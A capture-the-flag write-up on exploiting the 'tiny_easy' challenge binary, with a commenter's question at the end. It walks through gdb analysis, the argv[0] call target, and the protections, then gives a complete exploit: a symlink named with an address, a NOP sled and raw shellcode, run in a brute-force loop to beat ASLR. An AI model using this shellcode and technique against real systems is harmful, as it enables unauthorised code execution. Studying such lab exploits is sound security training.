Run the program and it crashed. Load it with gdb-peda, break at entry point and run:
0x8048054: pop eax
0x8048055: pop edx
0x8048056: mov edx,DWORD PTR [edx]
0x8048058: call edx
So if the program is at /home/c/ctf/tiny_easy
, the address being called is EDX: 0x6d6f682f ('/hom')
.
Try exec -a AAAA ./tiny_easy
, the shell just exit and ssh connection is lost. In this case, we can add &
to the end of the command, and then fg
to switch to it. However it's too inconvenient.
Here considering soft link. We can just link the name we want to the program, and we can run it with the original permission.
Check the protection:
➜ ctf ./checksec --file tiny_easy
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY FORTIFIED FORTIFY-able FILE
No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH No 0 0 tiny_easy
And the system ASLR is enabled.
Since the stack of the program is non-executable, and the library is static linked, we can jump to other stacks for example the environment and the parameters passed to program.
We can construct code like [address][NOP]*n[shellcode]
and make a soft link. And then trying to execute it until we success.
mkdir /tmp/ihctiny
cd /tmp/ihctiny
ln -s /home/tiny_easy/tiny_easy `python -c "print '\x88\x88\x88\xff'+'\x90'*140+'\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3'"`
while true; do ./`python -c "print '\x88\x88\x88\xff'+'\x90'*140+'\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3'"`; done
Reference: http://www.secbox.cn/hacker/ctf/5547.html
I have a small doubt,
In [address][NOP]*n[shellcode] , how did you determine which value of address is to be used?